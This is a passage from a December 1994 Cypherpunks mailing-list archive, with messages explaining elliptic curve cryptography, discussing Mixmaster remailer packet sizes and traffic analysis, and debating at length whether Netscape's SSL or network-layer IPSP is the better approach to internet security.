substitute for the marketplace in a non money environment. Netscape is working in the real marketplace. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From db at Tadpole.COM Mon Dec 12 23:24:29 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 23:24:29 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <199412130621.AAA07346@pentagon.io.com> Message-ID: <9412130723.AA14508@tadpole.tadpole.com> > > > What, exactly is elliptic curve encryption? > Exponentiation-based ciphers such as Diffie-Hellman use the fact that discrete logarithms are hard, but modular exponentiation is easy. So we quickly compute: x^y mod n (where n is prime) But not: log_x(x^y mod n) mod n Think of the numbers between 0 and n-1 as a group that work sort of like all Integers taken as a whole. Because they do have many of these properties, this makes these numbers an "abelian" group. So we can use some old properties from arithmatic such as: (a * b * c) mod n == (((a * b) mod n) * c) mod n With an elliptic curve, such as y^2 = x^3 - x, you can define a set of coordinates {, ... } that are on the curve, where all x and all y are in a group like we use for Diffie-Hellman. For the different isomorphisms of the curves, you can then construct addition of coordinates, subtraction, multiplication and division, such that the results are also points on the curve. This makes this set of points an abelian group too. You can then do a Diffie Hellman analogue substituting multiplication for exponentiation, and a El Gamal analogue substituting multiplication for exponentiation and addition for multiplication. I have just recently been researching this subject, but I can provide some references tomorrow, if people are interested. I have found what appears to be an implementation of some of the artithmatic in a package called "pari", but I haven't had a chance to look at it closely. There are no p.d. elliptic curve _cryptography_ implementations that I'm aware of, which is something I'd like to see change... :-) There is an IEEE group working on a proposed standard at the moment; I need to get back to my contact with them to find out where they are at now. Most of the work in this area is being done by smart card people, because ec's seem to give you more bang for your buck in terms of modulus size, etc. Hope this helps. Doug From lcottrell at popmail.ucsd.edu Mon Dec 12 23:28:22 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Mon, 12 Dec 94 23:28:22 PST Subject: Standard Packet size. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I am about to release Mixmaster as a beta test. Before I do, I would like some input on what size message packet to standardize on. Each message includes twenty 1k headers, and a block with the message text. Right now I have the text block size set to 4k. That seems small, but I am worried about mail systems choking on big messages. Messages over the minimum size are sent separately (through the same chain), and only recombined by the last remailer in the chain. Previous remailers do not know that the message parts are associated. This is quite secure, but not as good as a single packet, so the fewer messages that get split up, the better. Mixmaster compresses the contents of the text block. So, any thoughts on what size the text block should be? BTW Mixmaster still only runs on Sun. Several people are working on porting it to linux. Help with porting to PC and Mac would be appreciated. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu1Ml1Vkk3dax7hlAQHWfAP+Kj2LyWBySVHfI0QTBBhEvF3b+ru/hywm kALdnXWUkbcSgRHQAMdSpwYza44M7Tc6sX++kDASSjwWyV80cTPHqFEPFmoEcbRV 1BPJB7SAkhwHGpRB5e0daLe0LAuS9KRHbTQcN//n0pUrbqMS2sVJCrDQ7kwrFC8L 3QEzCjWHsAQ= =Dc4G -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From hfinney at shell.portal.com Mon Dec 12 23:29:30 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 23:29:30 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122322.AA11307@snark.imsi.com> Message-ID: <199412130729.XAA01473@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- It is nice to have a lot of people on the list from Netscape. Here is a question about SSL relating to the use of certificates: + The issuer name must resolve to a name that is deemed acceptable by the application using SSL. How the application using SSL does this is outside the scope of this memo. What does Netscape actually do about this? If I want to make a server which will interoperate with existing Netscape clients what kind of certificate do I need, and what kind of name should be in there? Thanks - Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu1NOxnMLJtOy9MBAQGItwIAr4eerI+FSmPpOIcwITepnXzcUUFkPwsK +Rz2FC4Y6hV0HoDEt1JnpvCPVV5N74Jtc9xMmF8CcRlBybk25PkxVQ== =LOql -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 12 23:29:33 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 12 Dec 94 23:29:33 PST Subject: James vs. Eric Message-ID: <199412130734.CAA29659@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Eric # Perhaps you don't know the meaning of whitespace and paragraph breaks. James > And then he contradicts himself: # I did claim you were arguing from libertarian correctness. Now that's # just an insult, which I do not retract. [...] # Oh, please. Go back and read what I originally wrote. Perhaps I # overestimate your ability to ascertain relevance, though. > You do not demonstrate much ability to think rationally > in this posting. A self contradiction in three lines, > above, and some interesting logic to follow: [...] # This is not an argument. This is a premise. > I see: So you start off with the assumption that what > I was arguing was false, and because that is a premise > not an argument, you do not have to defend it or support it. "I do not need to PROVE these FACTS because they are INCORRECT and because I do not NEED to PROVE them they must be TRUE!!!" --James `Kibo' Parry, 2/22/94 > Nice piece of logic there. > I accused you of flaming before reading. Now you claim > that you did read it, but the laws of logic exempt you > from having to make rational criticism of what I wrote. > I think your defense denigrates you more than my original > accusation did. > Now back to some slight crypto relevance: [...] *heavy sigh* Eric & James, how about taking the "You're flaming me !" "No, I'm just insulting you !" portion of this debate to private email ? I sincerely doubt that very many people on the list give a damn about any of the above jousting. > Each posting I made was about the standards making process. Sticking to flaming about Internet standards, rather than flaming about who didn't read whose argument carefully, would be much more productive IMHO. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu1NHmf7YYibNzjpAQFJgwQAy/kPXuCrUb8mQSviXXJJC1USTuJqRhfS gHKtIjveZne4JRdkjzjK6O/hNcNwuKQrMefvgeTlVu4w7HE6geSTMrTogH8r2fF0 VjNe3XN90ad9QrO4Zk0y9NGKYEd5/LOnN5tlcM5ij2yjbVDDZMgWzj0pY1JTrtFJ /uvUSdsHHxU= =4lge - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu1OZSoZzwIn1bdtAQE5XgGAnqIZqNarnXwzvKkJfy3WPmNW6nwJOJjb nliPNeRmomtgeI27HJqrIYhzUXn40voS =K3HK -----END PGP SIGNATURE----- From Tony.Gurnick at nzdairy.co.nz Mon Dec 12 23:42:09 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Mon, 12 Dec 94 23:42:09 PST Subject: New zealand meetings? Message-ID: <94121320401594@nzdairy.co.nz> Does any of the kiwis on the list want to start some sort of informal meeting, (at georgie pie?) as going to the states for there meetings is a tad difficult. (all 5 of us that is) T From db at Tadpole.COM Mon Dec 12 23:50:25 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 23:50:25 PST Subject: Broadcasts - addressing In-Reply-To: Message-ID: <9412130749.AA14735@tadpole.tadpole.com> > > I am not completely clear on what sort of communication you are trying to > protect, and what your threat model is. Let's say that agent-in-place X posts to his controller whenever something of political significance happens in Foobarvia. A clever traffic analyst will notice that a certain key posts to alt.anonymous (or contributes to the pool, whatever it is) whenever something big happens in Foobarvia. Conclusions can be drawn -- there is a PGP-using spy in Foobarvia! By carefully limiting access to news tidbits, they can use process of elimination to find the spy. (In reality, it could be much more mundane -- every time Peggy Sue tells Mary Beth a secret, there is a post by the same keyid, etc.) However, if you use a public-key encryption scheme that doesn't store the key-id on the outside of the packet (or store it at all), then you are at liberty to identify the packets for decryption by the target recipient however you want. I've suggested an approach using tokens, which make all the messages from agent-in-place X unlinkable to one another (thus hindering the detection of the aforementioned pattern), while still allowing the recipient to sniff for them efficiently. > > Are you worried about an attacker noticing that an anonymous ID is getting a lot > of messages? If you are using PGP and a message pool, any attacker can decrypt > all the messages, and see which correspond to which key, and therefor to which > anonymous ID. The only way around this is to use private key crypto. If you are > doing that, then you can also use a shared secret to generate a stream of one > use message IDs. Clearly this involves using something other than vanilla PGP, or running some post- and pre- processing to delete and then add back in the key-id. The mandatory external presence of the key-id has always been less than optimal, IMHO. From Agorist003 at aol.com Mon Dec 12 23:51:58 1994 From: Agorist003 at aol.com (Agorist003 at aol.com) Date: Mon, 12 Dec 94 23:51:58 PST Subject: L.A. cpunx meeting Message-ID: <941213025205_4686155@aol.com> -----BEGIN PGP SIGNED MESSAGE----- Yep, still hosting the weekly L.A. Cypherpunks gathering at the: California Coffee House 4455 Overland Avenue Culver City, CA 90230 (310) 559-8868 Defend Your Privacy! from: "Big Brother" Government and "Dark Side" Hackers - ---------------- L.A. Cypherpunks Help create an "Infotopia," don't support an "Automatic Gestapo." Fight the Clipper "Snitch Chip." Drop in any time between 12 & 5PM Saturdays (excluding holidays). Let's plot and conspire, or at least exchange PGP key fingerprints. Tune Out (media lies), Turn Off (freeway), and Drop In (for coffee). Share information and sell stuff if you wish. I'm trying to get political types to show up, in addition to us computer geekazoids. Show up and get the latest brochure! I'll be there this Saturday, but not the 24th and possibly not in early January (I did say "excluding holidays"). But don't let that stop you unless the coffee house is closed. Kent - jkh at story.com (not yet) or agorist003 at aol.com -----BEGIN PGP SIGNATURE----- Version: 2.3 iQCVAgUBLuzgeA4ciVn87Ra9AQHHtQP/dTcF9HG+eB6RLqv9F0Q1/aTfRBMIC0i7 8S5/LxUlv9JiKEOqtLuN7cYMLaEKnVUJbrJU8EH2IJH4VecUk+nDCiMOLC6cNIKj FAGJl6CXDRbaA18Ibuye8u1kNpZckxfOBDhlYCArBHiCvRN3hfqHQzgnMpom1Zba 4Gq+nu7c3Zk= =E2Hr -----END PGP SIGNATURE----- From eric at remailer.net Mon Dec 12 23:54:42 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 23:54:42 PST Subject: BofA+Netscape In-Reply-To: <199412130652.WAA12984@netcom4.netcom.com> Message-ID: <199412130852.AAA01537@largo.remailer.net> From: jamesd at netcom.com (James A. Donald) ---------------------- 1. Plain talk. you wrote: > This is not an argument. This is a premise. I see: So you start off with the assumption that what I was arguing was false, and because that is a premise not an argument, you do not have to defend it or support it. You claimed that what you were saying was my argument. I pointed out that it wasn't an argument at all, that it was merely a premise for an argument. Pardon me, though, for assuming that you know the difference between a deduction and an assertion. What you summarized was merely an assertion. A deduction has some sense of the word "therefore" in it. What you summarized did not. Perhaps you thought you were summarizing the conclusion of my argument, which would have the form of an assertion. But if you were doing that, then you really did confuse an argument with its conclusion. Now, let me be perfectly clear here. I quote your summary just to make sure: > > The short of your argument is that Netscape will fragment the > > net by running out there and dumping something in the market > > place without consensing with all the big boys. This was a premise of my argument. Since you managed to restate one of my premises, I now know that you are able of taking letters of text and forming them into coherent sentences. What you have not yet demonstrated is the capacity for taking _all_ the letters of text and attempting an understanding of a complete position. ---------------------- 2. Typographically Challenged. Eric Hughes replies: > Perhaps you don't know the meaning of whitespace and paragraph breaks. And then he contradicts himself: > I did claim you were arguing from libertarian correctness. Now that's > just an insult, which I do not retract. Aren't we dense today? Paragraph 1: Insult Paragraph 2: Argument Whitespace and line breaks are used as thematic separators. Let me use very small words now: The first paragraph was about one thing, and the second paragraph was about something else. There was a blank line between the two which means that these two things are not like each other. ---------------------- 3. Semper Fidelis. I accused you of flaming before reading. Now you claim that you did read it, but the laws of logic exempt you from having to make rational criticism of what I wrote. I asked you to summarize what you thought I meant. I no longer believe that you're making a good faith effort to talk about the same thing, so I wanted at least to try to make explicit the lack of agreement about each other's positions. Personally, I think it's a waste of time to discuss a topic where there's not basic agreement on the other's position. Were it not for the fact that you continue to address the actual issue after insults of your own, I would have already ignored this thread. ---------------------- 4. Striving to think. I argue that good standards are created by victory in the market place, and bad standards are made by committees and consensus. Without altering the denotation of the sentence I can interpret this as "all good standards" and "all bad standards". Well, that sounds like an example of Libertarian Correctness to me. The flies in the market place _uber alles_! You argue game theory that would be valid given your premise that cooperation works in this case. You are seriously misrepresenting my position in this restatement. First, you will not distinguish between a simple indicative and a modal form. What I was pointing out is that it's not clear that cooperation doesn't work, i.e. it may work. "May" here is the modal form. Second, you will not distinguish an implication from its converse. I argued that, given plausible game-theoretic assumptions, that the best outcome is cooperation. Game theory is the premise; cooperation is the conclusion. Mind you, I'm talking to the _rest_ of the list here. ---------------------- 5. In the boat with Chomsky. And now The Amazing James, reader of minds, will tell me what I really meant to say: Your so called "game theory" is just code for the moral assumption that Netscape are wicked not to engage in consensus. De mortuis mentis, nil nisi Latinum. ---------------------- 6. A tip: avoid auctions. You do not reason using game theory, you use it as a code to express moral claims without having to justify them. James Donald asked be asked me what iterated dominance was a couple of weeks ago. James, do you know _anything_ about game theory? Anything at all? Eric From pfinerty at seattleu.edu Mon Dec 12 23:57:25 1994 From: pfinerty at seattleu.edu (being) Date: Mon, 12 Dec 94 23:57:25 PST Subject: dr. dobbs - where? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- i'd like to know where i can find dr. dobbs. i came up with a lot of stuff (52 hits actually) using gopher but i'd prefer some sort of mailing list or even better, a WWW page for it. of course, if there is a std ftp site i'd go for that as well. basically, i'm easy to please. i just want to read the crypto articles mention by bruce. life, you see, is not meant to be enjoyed. -me right now pfinerty at bach.seattleu.edu finerty at msscc.med.utah.edu finger any acct. for pgp key pfinerty at nyx10.cs.du.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBLu1UMbJv5rDIkn05AQGLVQH/RTZJaIU6Do1xCfU2RG586SzJZJFh6/Pb J5cG+j/zswDt/5hxmFxUl3Vk1zSMWERoo7mLP3c4s9jTuLmr7s+wOw== =xxA+ -----END PGP SIGNATURE----- From eric at remailer.net Tue Dec 13 00:06:13 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 13 Dec 94 00:06:13 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <9412130723.AA14508@tadpole.tadpole.com> Message-ID: <199412130903.BAA01594@largo.remailer.net> From: db at Tadpole.COM (Doug Barnes) For the different isomorphisms of the curves, you can then construct addition of coordinates, subtraction, multiplication and division, such that the results are also points on the curve. This makes this set of points an abelian group too. Well, you actually get just addition and subtraction as binary operations. Multiplication is integers by elliptic curve elements and is shorthand for multiple additions. Division doesn't always make sense. You can then do a Diffie Hellman analogue substituting multiplication for exponentiation, and a El Gamal analogue substituting multiplication for exponentiation and addition for multiplication. The multiplication takes an integer (the exponent analogue) by a curve element (the base analogue). There is an IEEE group working on a proposed standard at the moment; I need to get back to my contact with them to find out where they are at now. Burt Kaliski of RSA Labs is the chair of P1363. Archives are at rsa.com. Eric From tcmay at netcom.com Tue Dec 13 00:44:34 1994 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 13 Dec 94 00:44:34 PST Subject: dr. dobbs - where? In-Reply-To: Message-ID: <199412130844.AAA10371@netcom18.netcom.com> being wrote: > i'd like to know where i can find dr. dobbs. i came up with a lot of stuff > (52 hits actually) using gopher but i'd prefer some sort of mailing list or > even better, a WWW page for it. of course, if there is a std ftp site i'd go > for that as well. basically, i'm easy to please. i just want to read the > crypto articles mention by bruce. i wondered the same thing for a long time, looking with archie for this item, and another, something called "scientfic american" that gets quoted a lot (but isn't a scientific american an oxymoron? I guess not) i finally found this dr. dobbs in a place called a bookstore...imagine that. it seems that dr. dobbs is a magazine, a relic printed on either papyrus or paper, i'm not sure which. it used to be called "dr. dobbs journal of computer orthodentia: running light without overbyte" (or words to that effect)). the immmortal jim warren, who has attended at least two cypherpunks meetings and who founded various important computer trade shows (which he sold to others, thus ensuring his life of retirement), founded this "magazine" in the mid-70s, which explains why it uses such an archaic format as papyrus (or is it paper?). seriously, byte, dr. dobbs, scientific american, and the economist are available only in paper form, but are nonetheless vastly more useful than nearly anything on the net. this is especially true, of course, of the crypto literature, where vast amounts of goodness are confined to cellulose. it may change in our lifetimes, perhaps even in my lifetime. not surprising to this group, payment for electronic forms is an issue. --klaus! von future prime From marca at mcom.com Tue Dec 13 00:58:01 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 00:58:01 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412130858.IAA10735@neon.mcom.com> In article <9412121811.AA55359 at amanda.dial.intercon.com>, amanda at intercon.com (Amanda Walker) wrote: > > As for the IETF standards process, we are pushing the > > document into the RFC process. > > Precisely. Rather than working with others in the industry and research > communities, you are trying to push your proposal into the standards track. Amanda, we're not trying to push anything into the standards track. We're publishing SSL as an informational RFC, and we have separately submitted SSL as a proposal to the W3O working group on security (in parallel with SHTTP and a handful of other proposals). Nothing is being pushed into the standards track. We are trying to work with others in the industry and research communities, via the above actions, by publishing SSL on our server, by participating in this forum and others, etc., and we are generally succeeding, judging from the overall high level of feedback we're getting from people genuinely interesting in discussing the issues. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Tue Dec 13 00:58:24 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 00:58:24 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412130858.IAA10739@neon.mcom.com> In article <199412130318.TAA00912 at largo.remailer.net>, eric at remailer.net (Eric Hughes) wrote: > From: "Kipp E.B. Hickman" > > If this hadn't been made clear already, then hopefully this will: > > Our intention is to support any development effort attempting > to implement an SSL conformant implementation. We will work with > you to repair the spec as needed to eliminate any errors or > ommisions, and help you test your implementation to ensure that > it interoperates with ours. > > It's clear to me. "We're going to use some security, as long as it's > called SSL and our authorship is on the document." No, he didn't say that -- you're jumping to conclusions based on a statement he's making on a separate topic. We're going to support security mechanisms as they are required and accepted by the market -- functionality, protocols, formats, etc. -- whether or not they are called SSL and whether or not our authorship is on the document. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Tue Dec 13 00:58:54 1994 From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen) Date: Tue, 13 Dec 94 00:58:54 PST Subject: IPSP and Netscape Message-ID: <199412130859.IAA10748@neon.mcom.com> In article <199412130302.TAA00871 at largo.remailer.net>, eric at remailer.net (Eric Hughes) wrote: > ... the claims that SSL is better than anything > else out there I'm sorry, I don't remember such a claim being made. > ... The original denial of IPSP's > potential utility Likewise, I don't recall anyone denying IPSP's potential utility (particularly with emphasis on *potential*). Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From ddt at lsd.com Tue Dec 13 01:44:02 1994 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 13 Dec 94 01:44:02 PST Subject: THREAD X: subject y Message-ID: -----BEGIN PGP SIGNED MESSAGE----- "And Now, For Something Completely Different" I wish all subject fields in msg headers had two parts: 1. the THREAD begin referred to. 2. the SUBJECT of that particular msg. That way, I might be able to follow some of these discussions better. Sure, I can hear you saying it right now: "Jeeze, Dave, dontchaknow MIME can do that?" Sure, but we all know that's beside the Real Issue. We on this list once, looong ago, experimented with META: prefixes to do this, but no one here (or anywhere, to be fair) seems disciplined enough to stick to this. I don't have any proposal anymore. I gave up on trying to fix the world a long time ago. I just struggle along with everyone else and occasionally whine a bit to my Congressperson. No that's a lie: I'm MAD as hell and I'm not gonna take it anymore! Yeah! That's it! dave _________________________________________________________________________ "You can put your shoes in the oven, but that don't make 'em biscuits." -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLu04r6HBOF9KrwDlAQEZ/wP/WSrC5jbPDgfwAEjrMwqY2EB6aIJ9E15+ mx2M1nH+UHFlHkes+MuYzmOeDtxQYeYq6dz/mnSycP/gpUdCZI/WibteShQNdzL3 jccSed/5T7CL0aX+1qThajoB/BRB0cBU+L6kaWdZJyCV0I88xw2OdYG9Gkhsp0sp 1NGLfYAaQOI= =b53r -----END PGP SIGNATURE----- From HSAID at cairo.eun.eg Tue Dec 13 03:28:15 1994 From: HSAID at cairo.eun.eg (HSAID at cairo.eun.eg) Date: Tue, 13 Dec 94 03:28:15 PST Subject: subscription terminstion Message-ID: <01HKLHEHFPB6006HMI@FRCU.EUN.EG> please i want to terminate my subscription in your groupe because i have small quota . From Steve_Gibson at bionomics.org Tue Dec 13 04:31:24 1994 From: Steve_Gibson at bionomics.org (Steve Gibson/Bionomics) Date: Tue, 13 Dec 94 04:31:24 PST Subject: Bionomics Institute -- New discussion group and newsletter Message-ID: <9412131430.AA2066@notes.worldcom.com> How is new technology transforming the economy? How will it alter the fundamental qualities of economic life? We don't have all the answers. But we do have a powerful new way to look at the the revolutionary changes brought about by the emergence of the Information Age. And, we have leading edge thinkers and doers from a remarkable variety of disciplines -- high-technology, biology, economics, public policy, business and more -- who share the powerful idea that the economy is an ecosystem. That's right: the economy is _not_ some giant machine. It's like a rainforest. A virtual rainforest where coded information, like DNA, defies entropy. Where organizations (like organisms) cooperate, compete and evolve in a complex, self-organizing process that is not only unplanned, but unplan-able. (Sounds like the Internet, doesn't it.) And, now, we have a discussion group: evolve at bionomics.org. As well as an occasional newsletter: just.the.facts at bionomics.org. JOINING -- send to info at bionomics.org with "SUBSCRIBE Evolve" or "SUBSCRIBE Just.the.facts" in the subject line. Participants in "Evolve" will get "just.the.facts" automatically. CONTRIBUTING -- send to evolve at bionomics.org. This is an archived, quasi-moderated discussion. Signal-to-noise will be kept high. VANISHING -- send "unsubscribe" or any questions to info at bionomics.org or to our domain postmaster, klacobie at bionomics.org. This message comes to you because either we read this list or people keep telling it's right up our alley. Now we want you to come explore the truths and consequences of the infoweb with us. And bring your friends. (If you don't have any friends, you're probably spending too much time reading email.) You made it this far... hit and take a lurk. Become a part of the bionomic community, where high-technology and the free-market converge. Regards, Steve Gibson Executive Director The Bionomics Institute From perry at imsi.com Tue Dec 13 06:29:38 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 06:29:38 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <199412130436.UAA26914@netcom4.netcom.com> Message-ID: <9412131428.AA12085@snark.imsi.com> James A. Donald says: > But reality is that they have produced by far the coolest browser > there is, and they are bringing crypto to the masses, and you, > and Eric Hughes, and most of us, have not yet brought crypto > to the masses. > > Give them credit for doing what we have talked of doing, but > have not actually done. You claim we haven't done anything and Netscape has. ftp.csua.berkeley.edu has the swIPe code sitting right on it. Its being deployed by TIS in their new firewall products, and is being used by others. I could have conducted the full PR campaign to get people using it, but have chosen not to because I don't want to have to later sell them on an (incompatible) IPSP packet format (which is superior). I'm already working on hacking swIPe into IPSP. Netscape looks foolish because they don't bother to look at other people's work. I won't comment on you. Perry From perry at imsi.com Tue Dec 13 06:31:39 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 06:31:39 PST Subject: James Donald's comments Message-ID: <9412131431.AA07769@webster.imsi.com> James Donald has claimed that I've been talking about vaporware and that Netscape has produced "real cool crypto for the masses". As I've noted, real code to implement proposals quite similar to IPSP is out there right now, and has been for half a year. The reason that it isn't very widely deployed is largely because we haven't been pushing it because it isn't fully clean yet, not because it couldn't be used. (It is indeed being used by real people with real applications). .pm From perry at imsi.com Tue Dec 13 06:43:12 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 06:43:12 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412131442.AA12105@snark.imsi.com> Marc Andreessen says: > >I told you in Email, Mr. Andreessen, that new transport level security > >protocols are useless now that IPSP has come near to standardization > >and now that prototype implementations are nearly available. > > Great, IPSP looks fantastic and we look forward to supporting it > as it moves through and beyond the "near" phase. Given that you haven't read any IPSP documents, I can only interpret your comments as sarcasm. If they aren't sarcasm, they represent more of the same "why bother to do any research" attitude that got you into trouble in the first place. When I wrote you mail explaining that solutions on top of the transport layer were becoming rapidly obsolete, you dismissed me off hand, not even having bothered to check the literature on the subject. I don't mind an informed discussion in which individuals like yourself say things like "I don't like the encapsulation formats proposed in IPSP because they don't give me enough flexibility to do X" or things of that nature. I wouldn't mind a "we examined IPSP and found it lacking". However, you didn't even bother to look at anything I mentioned. You dismissed it without knowing what it was. Your fellows seem so ignorant on the subject that they think that network layer security requires changes to the routing infrastructure (it does not -- it can even be implemented at user level using BPF or NIT, though I don't recommend that.) The thing I find truly outrageous about the Netscape crowd is that you apparently did some navel staring, came up with an idea internet security, and proceeded to go off and do it. Not for one moment did you consider the possibility that others might have already done something worth looking at, or that it might even be already developed and on its way to standardization. Perry From perry at imsi.com Tue Dec 13 06:45:56 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 06:45:56 PST Subject: IPSP and Netscape In-Reply-To: <199412130551.VAA10080@islay.mcom.com> Message-ID: <9412131445.AA12113@snark.imsi.com> John Giannandrea says: > > Eric Hughes writes: > > It may be that IPSP is not the quickest or best way to link > > security, but that is not the point I am making here. The > > original denial of IPSP's potential utility was made in > > complete ignorance > > Widespread acceptance of IPSP may well make SSL irrelevant. > I do not believe that anyone at Netscape is claiming otherwise. > > Nonetheless, widespread implementation of IPSP simply does not exist > at this time. We need a solution for our customers _today_. Fine. Widespread implementation of SSL doesn't exist, either. You can probably deploy IPSP to the bulk of your customers just as fast. The effort is no different, and the results are better. Now, maybe I'm wrong -- but how would you guys know, not having even examined the literature? > I do not believe that we are either arrogant nor ignorant in creating SSL. Since you didn't bother to even examine the other alternatives, I'd say you were ignorant. Since you refused to listen when this was pointed out, I'd say you were arrogant. Perry From perry at imsi.com Tue Dec 13 06:47:38 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 06:47:38 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <199412130621.AAA07346@pentagon.io.com> Message-ID: <9412131447.AA12121@snark.imsi.com> dfloyd at io.com says: > What, exactly is elliptic curve encryption? Basically, there are ways of extending public key methods into fields other than the integers modulo some prime -- you can also perform these methods in fields based on so-called eliptic curves, and when you do it turns out that there are certain speed benefits. Perry From avi at clas.ufl.edu Tue Dec 13 06:48:50 1994 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Tue, 13 Dec 94 06:48:50 PST Subject: the netscape/ssl controversy Message-ID: <199412131448.JAA07613@cutter.clas.ufl.edu> have to get my two cents in: netscape has a proposal that secures the *transport* of files. pgp and the like secure the actual files themselves. the question that will have to be answered is "which method of security is more valuable to the internet as a whole?" of course i have made up my mind, but i'll waste some space and share those thoughts here. i sit on a committee at the college of agriculture here at uf, where we are discussing how to implement the web. many of these people come from beauracratic and publishing (the college publishes lots) backgrounds. they want control and accountability. they don't want someone to download some chemical information, believing that it is correct (as certified by the university), but in actuality that information was forged. i (and a few others) brought up digital signatures as a way of guaranteeing authenticity of documents. but this would an awful pain to implement, simply because the products do not support it. ssl can not provide this. ssl can guarantee that the document was not modified from the server it originated from until i got it. but who is to say that the server i got it from was the authoritative server? that's merely one example of where ssl provides no added benefit, but other encryption technologies do. so what is a better solution? i would choose a mime multipart using pgp or some other cryptographic method. if integrated into the web client, it could be just as seamless to the user, but now instead of encrypting the link between two computers, it encrypts (or signs) the document itself, since that's what i'm really interested in anyway (is the document). i could care little about the link - and that's the premise of the internet, that the link is unimportant as long as it works. so while ssl may well be a wonderful protocol, it does not address the problems that many cypherpunks see as being real. i think it would do netscape good to listen to and consider the views of many on this list, as they have many genuinely good ideas, even if they choose a confrontational manner. -avi From michael.shiplett at umich.edu Tue Dec 13 07:20:59 1994 From: michael.shiplett at umich.edu (michael shiplett) Date: Tue, 13 Dec 94 07:20:59 PST Subject: dr. dobbs - where? In-Reply-To: Message-ID: <199412131520.KAA21199@truelies.rs.itd.umich.edu> "b" == being writes: b> i'd like to know where i can find dr. dobbs. ftp://ftp.mv.com/pub/ddj contains some of the code published in the magazine. for the articles (and the rest of the code), you'll need to stop by a magazine stand or library. michael From perry at imsi.com Tue Dec 13 07:35:42 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 07:35:42 PST Subject: IPSP and Netscape In-Reply-To: <199412130859.IAA10748@neon.mcom.com> Message-ID: <9412131535.AA12199@snark.imsi.com> Marc Andreessen) (by way of marca at mcom.com (Marc Andreessen) says: > > ... The original denial of IPSP's > > potential utility > > Likewise, I don't recall anyone denying IPSP's potential > utility (particularly with emphasis on *potential*). >From what I can tell, SSL's utility is at least as *potential*. .pm From amanda at intercon.com Tue Dec 13 07:46:45 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 07:46:45 PST Subject: HTTP security Message-ID: <9412131046.AA05938@amanda.dial.intercon.com> > This seems a very relevant criticism: Has Amanda, or anyone else > proposed an extension to HTML that would incorporate such things? Actually, it's not an extension to HTML, but to MIME (whose formats HTTP uses top tag and label data), and it just went to Proposed Standard (the last step before Internet Standard). The MIME multipart/signed and multipart/encrypted body parts allow anything using MIME encapsulation to sign and/or encrypt arbitrary body parts. Since it's at the document layer, it requires no special transport software, works with existing proxies and caching servers, and allows secure HTTP software to share code with secure email software (since it would use exactly the same formats). The framework is general enough to allow use with either PEM-compliant signatures and encryption or others (such as PGP). I believe that can also be used with symmetric key management, which could be useful for special purpose applications. EInet's secure SHTTP proposal is also an end-to-end security framework. Amanda Walker InterCon Systems Corporation From jya at pipeline.com Tue Dec 13 07:52:03 1994 From: jya at pipeline.com (John Young) Date: Tue, 13 Dec 94 07:52:03 PST 